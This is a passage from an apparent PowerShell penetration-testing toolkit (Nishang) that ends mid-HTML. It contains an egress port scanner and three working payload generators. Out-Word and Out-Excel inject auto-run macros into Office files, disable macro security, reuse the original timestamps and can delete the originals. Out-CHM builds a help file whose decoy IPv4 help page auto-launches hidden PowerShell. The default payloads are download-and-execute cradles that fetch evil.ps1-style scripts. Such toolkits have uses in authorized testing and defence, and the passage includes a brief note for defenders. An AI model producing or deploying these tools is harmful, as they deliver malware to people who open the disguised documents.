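                $newjobs = start-job -ScriptBlock $socketblock -ArgumentList $port -Name $port
                Get-Job | Remove-Job
            }
        }
    }
}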
4308
4309################################################## Connector for Egress Testing ##########################################################
4310
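function FireBuster{

<#
.SYNOPSIS
This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine.

.DESCRIPTION
FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be VERY slow).
The target may be given as an IP address or a host name; each port is tried with a 300 ms connect timeout.

.PARAMETER targetip
The IP address or host name of the machine running FireListener.

.PARAMETER portrange
Port range to try, as "low-high" or a single port. Default is "1-65535".

.EXAMPLE
PS> FireBuster 10.10.10.10 1000-1020

.EXAMPLE
PS> FireBuster 10.10.10.10 1000-1020 -Verbose
Use above for increased verbosity.

.LINK
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
https://github.com/samratashok/nishang
http://roo7break.co.uk

.NOTES
Major part of the script is written by Nikhil ShreeKumar (@roo7break)
#>

    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $targetip,

        [Parameter(Position = 1, Mandatory = $False)]
        [String] $portrange = "1-65535"
    )

    #Accept "low-high" or a single port.
    $bounds = $portrange.split("-")
    [int] $lowport = $bounds[0]
    [int] $highport = if ($bounds.Length -gt 1) { $bounds[1] } else { $bounds[0] }

    #Resolve before errors are silenced: a literal IP first, otherwise DNS (the help promises
    #both). Previously a host name made IPAddress.Parse fail quietly and every connect was
    #attempted against $null, ending with a misleading "Data sent to all ports".
    $hostaddr = $null
    if (-not [System.Net.IPAddress]::TryParse($targetip, [ref]$hostaddr))
    {
        $hostaddr = [System.Net.Dns]::GetHostAddresses($targetip) | Select-Object -First 1
    }
    if (-not $hostaddr)
    {
        throw "FireBuster: could not resolve '$targetip' to an IP address."
    }

    #Connection failures are the expected outcome on filtered ports; keep them quiet.
    $ErrorActionPreference = 'SilentlyContinue'
    Write-Verbose "Trying to connect to $hostaddr from $lowport to $highport"
    [int] $ports = 0
    $TimeOut = 300
    Write-Host "Sending...."
    for($ports=$lowport; $ports -le $highport ; $ports++){
        try{
            Write-Verbose "Trying port $ports"
            $client = New-Object System.Net.Sockets.TcpClient
            $beginConnect = $client.BeginConnect($hostaddr,$ports,$null,$null)
            #Wait up to the timeout for the async connect to finish rather than always sleeping
            #the full interval; Connected reflects the outcome once the handle is signalled.
            $null = $beginConnect.AsyncWaitHandle.WaitOne($TimeOut)
            if($client.Connected)
            {
                Write-Host "Connected to port $ports" -ForegroundColor Green
            }
            $client.Close()
        }catch { Write-Error $Error[0]}
    }
    Write-Host "Data sent to all ports"
}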
4376
4377##################################Client Side Attack functions######################################
4378#######################################Out-Word#############################################
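function Out-Word
{
<#
.SYNOPSIS
Nishang Script which can generate and "infect" existing word files with an auto executable macro.

.DESCRIPTION
The script can create as well as "infect" existing word files with an auto executable macro. Powershell payloads
could be executed using the generated files. If a folder is passed to the script it can insert macro in all existing word
files in the folder. With the Recurse switch, sub-folders can also be included.
For existing files, a new macro enabled doc file is generated from a docx file and for existing .doc files, the macro code is inserted.
LastWriteTime of the docx file is set to the newly generated doc file. If the RemoveDocx switch is enabled, the
original docx is removed and the data in it is lost.

Note that the script lowers Macro Security for Word in the CURRENT user's registry on the machine
where it runs (AccessVBOM and VBAWarnings are set to 1) and leaves it that way unless -RemainSafe is used.

.PARAMETER Payload
Payload which you want execute on the target. It is inserted verbatim into a VBA string literal,
so a literal double quote inside it must be doubled ("").

.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target. Used by the default payload,
which downloads the script and runs it in memory; an http:// URL is fetched in clear text.

.PARAMETER Arguments
Arguments to the powershell script to be executed on the target. Appended to the default payload
as a separate statement after the download-and-execute one-liner.

.PARAMETER WordFileDir
The directory which contains MS Word files which are to be "infected".

.PARAMETER OutputFile
The path for the output Word file. Default is Salary_Details.doc in the current directory.

.PARAMETER Recurse
Recursively look for Word files in the WordFileDir

.PARAMETER RemoveDocx
When using the WordFileDir to "infect" files in a directory, remove the original ones after creating the infected ones.

.PARAMETER RemainSafe
Use this switch to turn on Macro Security on your machine after using Out-Word. It writes 0 to
AccessVBOM and VBAWarnings; it does not restore any custom value that existed before.

.EXAMPLE
PS > Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"

Use above command to provide your own payload to be executed from macro. A file named "Salary_Details.doc" would be generated
in the current directory.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1

Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file
named "Salary_Details.doc" would be generated in the current directory.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil

Use above when you want to use the default payload, which is a powershell download and execute one-liner.
The Arguments parameter allows to pass arguments to the downloaded script.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\docfiles\Generated.doc

In above, the output file would be saved to the given path.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\

In above, in the C:\docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name
and same Last Modified Time.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ -Recurse

The above command would search recursively for .docx files in C:\docfiles.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ -Recurse -RemoveDocx

The above command would search recursively for .docx files in C:\docfiles, generate macro enabled .doc files and
delete the original files.

.EXAMPLE
PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -RemainSafe

Out-Word turns off Macro Security. Use -RemainSafe to turn it back on.


.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
#>

    [CmdletBinding()] Param(

        [Parameter(Position=0, Mandatory = $False)]
        [String]
        $Payload,

        [Parameter(Position=1, Mandatory = $False)]
        [String]
        $PayloadURL,

        [Parameter(Position=2, Mandatory = $False)]
        [String]
        $Arguments,

        [Parameter(Position=3, Mandatory = $False)]
        [String]
        $WordFileDir,

        [Parameter(Position=4, Mandatory = $False)]
        [String]
        $OutputFile="$pwd\Salary_Details.doc",


        [Parameter(Position=5, Mandatory = $False)]
        [Switch]
        $Recurse,

        [Parameter(Position=6, Mandatory = $False)]
        [Switch]
        $RemoveDocx,

        [Parameter(Position=7, Mandatory = $False)]
        [Switch]
        $RemainSafe
    )

    $Word = New-Object -ComObject Word.Application
    $WordVersion = $Word.Version

    #Check for Office 2007 or Office 2003: older versions take a boolean for DisplayAlerts,
    #newer ones the WdAlertLevel enum.
    if (($WordVersion -eq "12.0") -or ($WordVersion -eq "11.0"))
    {
        $Word.DisplayAlerts = $False
    }
    else
    {
        $Word.DisplayAlerts = "wdAlertsNone"
    }
    #Turn off Macro Security (on this machine, for the current user): AccessVBOM=1 allows the VBA
    #project to be edited through COM, VBAWarnings=1 enables all macros. Persists unless -RemainSafe.
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force | Out-Null
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force | Out-Null

    if(!$Payload)
    {
        #Default: hidden download-cradle that evaluates the fetched script; $Arguments runs as a following statement.
        $Payload = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
    }
    #Macro Code: Document_Open fires when the document is opened and macros run; the payload is
    #launched through WMI Win32_Process with a hidden window. $Payload is interpolated into a VBA
    #string literal as-is.
    #Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
    $code = @"
 Sub Document_Open()
 Execute

 End Sub


 Public Function Execute() As Variant
 Const HIDDEN_WINDOW = 0
 strComputer = "."
 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
 Set objConfig = objStartup.SpawnInstance_
 objConfig.ShowWindow = HIDDEN_WINDOW
 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
 objProcess.Create "$Payload", Null, objConfig, intProcessID
 End Function
"@


    if ($WordFileDir)
    {
        $WordFiles = Get-ChildItem $WordFileDir\* -Include *.doc,*.docx
        if ($Recurse -eq $True)
        {
            $WordFiles = Get-ChildItem -Recurse $WordFileDir\* -Include *.doc,*.docx
        }
        #The instance created above was only needed for version detection; quit it here,
        #otherwise a WINWORD.EXE is left running after the function returns.
        $Word.Quit()
        [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Word) | Out-Null
        ForEach ($WordFile in $WordFiles)
        {
            $Word = New-Object -ComObject Word.Application
            $Word.DisplayAlerts = $False
            $Doc = $Word.Documents.Open($WordFile.FullName)
            $DocModule = $Doc.VBProject.VBComponents.Item(1)
            $DocModule.CodeModule.AddFromString($code)
            #Same directory and base name with a .doc extension; for a .doc input this is the input path itself.
            $Savepath = $WordFile.DirectoryName + "\" + $Wordfile.BaseName + ".doc"
            #Append .doc to the original file name if file extensions are hidden for known file types.
            #NOTE(review): this reads the Explorer setting of the machine generating the files, presumably
            #as a stand-in for the target's default — confirm that is the intent.
            if ((Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced).HideFileExt -eq "1")
            {
                $Savepath = $WordFile.FullName + ".doc"
            }
            #Format 0 = wdFormatDocument (binary .doc, which can carry macros).
            if (($WordVersion -eq "12.0") -or ($WordVersion -eq "11.0"))
            {
                $Doc.Saveas($SavePath, 0)
            }
            else
            {
                $Doc.Saveas([ref]$SavePath, 0)
            }
            Write-Output "Saved to file $SavePath"
            $Doc.Close()
            #Keep the original timestamp so the new file does not stand out in a listing.
            $LastModifyTime = $WordFile.LastWriteTime
            $FinalDoc = Get-ChildItem $Savepath
            $FinalDoc.LastWriteTime = $LastModifyTime
            if ($RemoveDocx -eq $True)
            {
                Write-Output "Deleting $($WordFile.FullName)"
                Remove-Item -Path $WordFile.FullName
            }
            $Word.quit()
            [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Word) | Out-Null
        }
    }
    else
    {
        $Doc = $Word.documents.add()
        $DocModule = $Doc.VBProject.VBComponents.Item(1)
        $DocModule.CodeModule.AddFromString($code)
        if (($WordVersion -eq "12.0") -or ($WordVersion -eq "11.0"))
        {
            $Doc.Saveas($OutputFile, 0)
        }
        else
        {
            $Doc.Saveas([ref]$OutputFile, [ref]0)
        }
        Write-Output "Saved to file $OutputFile"
        $Doc.Close()
        $Word.quit()
        [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Word) | Out-Null
    }

    if ($RemainSafe -eq $True)
    {
        #Turn on Macro Security (writes 0; any pre-existing custom value is not restored).
        New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name AccessVBOM -Value 0 -Force | Out-Null
        New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name VBAWarnings -Value 0 -Force | Out-Null
    }
}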
4619
4620#######################################Out-Excel#############################################
4621
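function Out-Excel
{

<#
.SYNOPSIS
Nishang Script which can generate and "infect" existing excel files with an auto executable macro.

.DESCRIPTION
The script can create as well as "infect" existing excel files with an auto executable macro. Powershell payloads
could be executed using the generated files. If a folder is passed to the script it can insert macro in all existing excel
files in the folder. With the Recurse switch, sub-folders can also be included.
For existing files, a new macro enabled xls file is generated from a xlsx file (only *.xlsx files are picked up
from the directory). LastWriteTime of the xlsx file is set to the newly generated xls file. If the RemoveXlsx
switch is enabled, the original xlsx is removed and the data in it is lost.

Note that the script lowers Macro Security for Excel in the CURRENT user's registry on the machine
where it runs (AccessVBOM and VBAWarnings are set to 1) and leaves it that way unless -RemainSafe is used.

.PARAMETER Payload
Payload which you want execute on the target. It is inserted verbatim into a VBA string literal,
so a literal double quote inside it must be doubled ("").

.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target. Used by the default payload,
which downloads the script and runs it in memory; an http:// URL is fetched in clear text.

.PARAMETER Arguments
Arguments to the powershell script to be executed on the target. Appended to the default payload
as a separate statement after the download-and-execute one-liner.

.PARAMETER ExcelFileDir
The directory which contains MS Excel files which are to be "infected".

.PARAMETER OutputFile
The path for the output Excel file. Default is Salary_Details.xls in the current directory.

.PARAMETER Recurse
Recursively look for Excel files in the ExcelFileDir

.PARAMETER RemoveXlsx
When using the ExcelFileDir to "infect" files in a directory, remove the original ones after creating the infected ones.

.PARAMETER RemainSafe
Use this switch to turn on Macro Security on your machine after using Out-Excel. It writes 0 to
AccessVBOM and VBAWarnings; it does not restore any custom value that existed before.

.EXAMPLE
PS > Out-Excel -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"

Use above command to provide your own payload to be executed from macro. A file named "Salary_Details.xls" would be generated
in the current directory.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1

Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file
named "Salary_Details.xls" would be generated in the current directory.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil

Use above when you want to use the default payload, which is a powershell download and execute one-liner.
The Arguments parameter allows to pass arguments to the downloaded script.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\xlsfiles\Generated.xls

In above, the output file would be saved to the given path.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\xlsfiles\

In above, in the C:\xlsfiles directory, macro enabled .xls files would be created for all the .xlsx files, with the same name
and same Last Modified Time.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\xlsfiles\ -Recurse

The above command would search recursively for .xlsx files in C:\xlsfiles.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\xlsfiles\ -Recurse -RemoveXlsx

The above command would search recursively for .xlsx files in C:\xlsfiles, generate macro enabled .xls files and
delete the original files.

.EXAMPLE
PS > Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -RemainSafe

Out-Excel turns off Macro Security. Use -RemainSafe to turn it back on.


.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
#>


    [CmdletBinding()] Param(

        [Parameter(Position=0, Mandatory = $False)]
        [String]
        $Payload,

        [Parameter(Position=1, Mandatory = $False)]
        [String]
        $PayloadURL,

        [Parameter(Position=2, Mandatory = $False)]
        [String]
        $Arguments,

        [Parameter(Position=3, Mandatory = $False)]
        [String]
        $ExcelFileDir,

        [Parameter(Position=4, Mandatory = $False)]
        [String]
        $OutputFile="$pwd\Salary_Details.xls",


        [Parameter(Position=5, Mandatory = $False)]
        [Switch]
        $Recurse,

        [Parameter(Position=6, Mandatory = $False)]
        [Switch]
        $RemoveXlsx,

        [Parameter(Position=7, Mandatory = $False)]
        [Switch]
        $RemainSafe
    )

    #http://stackoverflow.com/questions/21278760/how-to-add-vba-code-in-excel-worksheet-in-powershell
    $Excel = New-Object -ComObject Excel.Application
    $ExcelVersion = $Excel.Version
    #Excel's Application.DisplayAlerts is a Boolean on every version (it is Word whose property is the
    #WdAlertLevel enum), so assign $False unconditionally; the string "wdAlertsNone" used for newer
    #versions before did not suppress the prompts.
    $Excel.DisplayAlerts = $False
    #Turn off Macro Security (on this machine, for the current user): AccessVBOM=1 allows the VBA
    #project to be edited through COM, VBAWarnings=1 enables all macros. Persists unless -RemainSafe.
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null

    if(!$Payload)
    {
        #Default: download-cradle that evaluates the fetched script; $Arguments runs as a following statement.
        $Payload = "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
    }
    #Macro Code: two variants with the same body. Auto_Open (in a standard module) is used for a
    #newly created workbook, Workbook_Open (in ThisWorkbook) for existing ones. The payload is
    #launched through WMI Win32_Process with a hidden window; $Payload is interpolated as-is.
    #Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
    $CodeAuto = @"
 Sub Auto_Open()
 Execute

 End Sub


 Public Function Execute() As Variant
 Const HIDDEN_WINDOW = 0
 strComputer = "."
 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
 Set objConfig = objStartup.SpawnInstance_
 objConfig.ShowWindow = HIDDEN_WINDOW
 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
 objProcess.Create "$Payload", Null, objConfig, intProcessID
 End Function
"@

    $CodeWorkbook = @"
 Sub Workbook_Open()
 Execute

 End Sub


 Public Function Execute() As Variant
 Const HIDDEN_WINDOW = 0
 strComputer = "."
 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
 Set objConfig = objStartup.SpawnInstance_
 objConfig.ShowWindow = HIDDEN_WINDOW
 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
 objProcess.Create "$Payload", Null, objConfig, intProcessID
 End Function
"@


    if ($ExcelFileDir)
    {
        #Only *.xlsx files are matched (unlike Out-Word, existing .xls files are not touched).
        $ExcelFiles = Get-ChildItem $ExcelFileDir *.xlsx
        if ($Recurse -eq $True)
        {
            $ExcelFiles = Get-ChildItem -Recurse $ExcelFileDir *.xlsx
        }
        #The instance created above was only needed for version detection; quit it here,
        #otherwise an EXCEL.EXE is left running after the function returns.
        $Excel.Quit()
        [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel) | Out-Null
        ForEach ($ExcelFile in $ExcelFiles)
        {
            $Excel = New-Object -ComObject Excel.Application
            $Excel.DisplayAlerts = $False
            $WorkBook = $Excel.Workbooks.Open($ExcelFile.FullName)
            $ExcelModule = $WorkBook.VBProject.VBComponents.Item(1)
            $ExcelModule.CodeModule.AddFromString($CodeWorkbook)
            $Savepath = $ExcelFile.DirectoryName + "\" + $ExcelFile.BaseName + ".xls"
            #Append .xls to the original file name if file extensions are hidden for known file types.
            #NOTE(review): this reads the Explorer setting of the machine generating the files, presumably
            #as a stand-in for the target's default — confirm that is the intent.
            if ((Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced).HideFileExt -eq "1")
            {
                $Savepath = $ExcelFile.FullName + ".xls"
            }
            #FileFormat 18 is kept as in the original (it is xlAddIn in XlFileFormat); NOTE(review): confirm
            #this is intended rather than 56 (xlExcel8, the plain 97-2003 workbook).
            $WorkBook.Saveas($SavePath, 18)
            Write-Output "Saved to file $SavePath"
            $Excel.Workbooks.Close()
            #Keep the original timestamp so the new file does not stand out in a listing.
            $LastModifyTime = $ExcelFile.LastWriteTime
            $FinalDoc = Get-ChildItem $Savepath
            $FinalDoc.LastWriteTime = $LastModifyTime
            if ($RemoveXlsx -eq $True)
            {
                Write-Output "Deleting $($ExcelFile.FullName)"
                Remove-Item -Path $ExcelFile.FullName
            }
            $Excel.Quit()
            [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel) | Out-Null
        }
    }
    else
    {
        $WorkBook = $Excel.Workbooks.Add(1)
        #Add(1) = a standard module, which is where Auto_Open must live.
        $ExcelModule = $WorkBook.VBProject.VBComponents.Add(1)
        $ExcelModule.CodeModule.AddFromString($CodeAuto)
        #FileFormat 18 is kept as in the original (it is xlAddIn in XlFileFormat); NOTE(review): confirm
        #this is intended rather than 56 (xlExcel8, the plain 97-2003 workbook).
        $WorkBook.SaveAs($OutputFile, 18)
        Write-Output "Saved to file $OutputFile"
        $Excel.Workbooks.Close()
        $Excel.Quit()
        [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel) | Out-Null
    }

    if ($RemainSafe -eq $True)
    {
        #Turn on Macro Security (writes 0; any pre-existing custom value is not restored).
        New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name AccessVBOM -Value 0 -Force | Out-Null
        New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\excel\Security" -Name VBAWarnings -Value 0 -Force | Out-Null
    }
}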
4867
4868#######################################Out-CHM#############################################
4869
4870
function Out-CHM
{

<#
.SYNOPSIS
Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.

.DESCRIPTION
The script generates a CHM file which needs to be sent to a target.
You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
HTML Help Workshop is a free Microsoft Tool and could be downloaded from below link:
http://www.microsoft.com/en-us/download/details.aspx?id=21138

The first topic page of the CHM carries a ShortCut object whose command line is cmd.exe /c powershell.exe
-WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile followed by the payload; a script block clicks it as soon
as the topic is shown, so nothing beyond opening the CHM is needed. Four intermediate files (doc.hhc, doc.htm, doc1.htm,
doc.hhp) are written to OutputPath for hhc.exe and removed after compilation.

.PARAMETER Payload
Payload which you want execute on the target. It is appended verbatim to the powershell.exe command line above.

.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target. Only used when Payload is not given.

.PARAMETER Arguments
Arguments to the powershell script to be executed on the target. Only used when Payload is not given.

.PARAMETER HHCPath
Path to the directory that contains hhc.exe (HTML Help Workshop). Mandatory.

.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.

.EXAMPLE
PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Above command would execute Get-Process on the target machine when the CHM file is opened.

.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use above command to generate CHM file which download and execute the given powershell script in memory on target.

.EXAMPLE
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use above command to generate CHM file which executes the encoded command/script.
Use Invoke-Encode from Nishang to encode the command or script.

.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use above command to pass an argument to the powershell script/module.

.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang

.Notes
Based on the work mentioned in this tweet by @ithurricanept
https://twitter.com/ithurricanept/status/534993743196090368

For defenders: the observable behaviour of a CHM built here is the help viewer process spawning cmd.exe, which in turn
spawns powershell.exe with the -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile command line embedded in
$CHMHTML1. That process lineage and command line are the natural detection points; the decoy topic text (IPv4 settings
help) is what the user sees.
#>



 [CmdletBinding()] Param(

 [Parameter(Position = 0, Mandatory = $False)]
 [String]
 $Payload,

 [Parameter(Position = 1, Mandatory = $False)]
 [String]
 $PayloadURL,

 [Parameter(Position = 2, Mandatory = $False)]
 [String]
 $Arguments,

 [Parameter(Position = 3, Mandatory = $True)]
 [String]
 $HHCPath,

 [Parameter(Position = 4, Mandatory = $False)]
 [String]
 $OutputPath="$pwd"
 )

 #Check if the payload has been provided by the user
 #If not, build a download cradle for $PayloadURL and append $Arguments. Neither value is validated here, so an
 #empty $PayloadURL silently yields a cradle with an empty URL.
 if(!$Payload)
 {
 $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
 }

 #Create the table of contents for the CHM
 #Topic names imitate Windows IPv4 networking help so the compiled file looks like an ordinary help file.
 #Both doc.htm entries point at the page that carries the payload; the doc1.htm entries are decoy-only.
 $CHMTableOfContents = @"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
 <UL>
 <LI> <OBJECT type="text/sitemap">
 <param name="Name" value="IPv4 Advanced IP Settings Tab">
 <param name="Local" value="doc.htm">
 </OBJECT>
 </UL>
 <UL>
 <LI> <OBJECT type="text/sitemap">
 <param name="Name" value="IPv4 Advanced WINS Tab">
 <param name="Local" value="doc1.htm">
 </OBJECT>
 </UL>
 <UL>
 <LI> <OBJECT type="text/sitemap">
 <param name="Name" value="IPv4 Alternate Configuration Tab">
 <param name="Local" value="doc.htm">
 </OBJECT>
 </UL>
 <UL>
 <LI> <OBJECT type="text/sitemap">
 <param name="Name" value="IPv4 and IPv6 Advanced DNS Tab">
 <param name="Local" value="doc1.htm">
 </OBJECT>
 </UL>
</BODY>
</HTML>
"@

 #Create the Project file for the CHM
 #The .hhp references the contents file and both topic pages by absolute path under $OutputPath.
 $CHMProject = @"
[OPTIONS]
Contents file=$OutputPath\doc.hhc
[FILES]
$OutputPath\doc.htm
$OutputPath\doc1.htm
"@
 #Create the HTM files, the first one controls the payload execution.
 #The OBJECT with Command=ShortCut holds the command line in Item1 (cmd.exe /c powershell.exe ... $Payload) and the
 #SCRIPT block calls x.Click() so it fires as soon as the topic renders. $Payload is interpolated into the Item1
 #attribute by PowerShell when this here-string is built. The long <html ...> block that follows is genuine-looking
 #IPv4 help text used as a decoy.
 $CHMHTML1 = @"
<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<BODY>

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile $Payload">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
x.Click();
</SCRIPT>

<html DIR="LTR" xmlns:MSHelp="http://msdn.microsoft.com/mshelp" xmlns:ddue="http://ddue.schemas.microsoft.com/authoring/2003/5" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:tool="http://www.microsoft.com/tooltip"><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1252"></META><META NAME="save" CONTENT="history"></META><title>IPv4 Advanced IP Settings Tab</title><link rel="stylesheet" type="text/css" href="../local/Classic.css"></link><script src="../local/script.js"></script></head><body><div id="header"><h1>IPv4 Advanced IP Settings Tab</h1></div><div id="mainSection"><div id="mainBody"><p class="runningHeader"></p>
<p>You can use the settings on this tab for this network connection only if you are not using the <b>Obtain an IP address automatically</b> on the <b>General</b> tab.</p>

<p><b>IP addresses</b> lists additional Internet Protocol version 4 (IPv4) addresses that can be assigned to this network connection. There is no limit to the number of IP addresses that can be configured. This setting is useful if this computer connects to a single physical network but requires advanced IP addressing because of either of the following reasons:</p>

<ul><li class="unordered">
A single logical IP network is in use and this computer needs to use more than one IP address to communicate on that network.<br /><br />
</li><li class="unordered">
Multiple logical IP networks are in use and this computer needs a different IP address to communicate with each of the different logical IP networks.<br /><br />
</li></ul>

<p><b>Default gateways</b> lists IP addresses for additional default gateways that can be used by this network connection. A default gateway is a local IP router that is used to forward packets to destinations beyond the local network. </p>

<p><b>Automatic metric</b> specifies whether TCP/IP automatically calculates a value for an interface metric that is based on the speed of the interface. The highest-speed interface has the lowest interface metric value. </p>

<p><b>Interface metric</b> provides a location for you to type a value for the interface metric for this network connection. A lower value for the interface metric indicates a higher priority for use of this interface. </p>
<h1 class="heading">Procedures</h1><div id="sectionSection0" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure additional IP addresses for this connection</b></td></tr></table><ddue:steps><ol class="ordered" xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">In <b>IP Addresses</b>, click <b>Add</b>.<b> </b></p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Type an IP address in <b>IP address</b>. </p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Type a subnet mask in <b>Subnet mask</b>, and then click <b>Add</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Repeat steps 1 through 3 for each IP address you want to add, and then click <b>OK</b>.</p>
</content></li></ol></ddue:steps>

<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure additional default gateways for this connection</b></td></tr></table><ddue:steps><ol class="ordered" xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">On the <b>IP Settings</b> tab, in <b>Default gateways</b>, click <b>Add</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
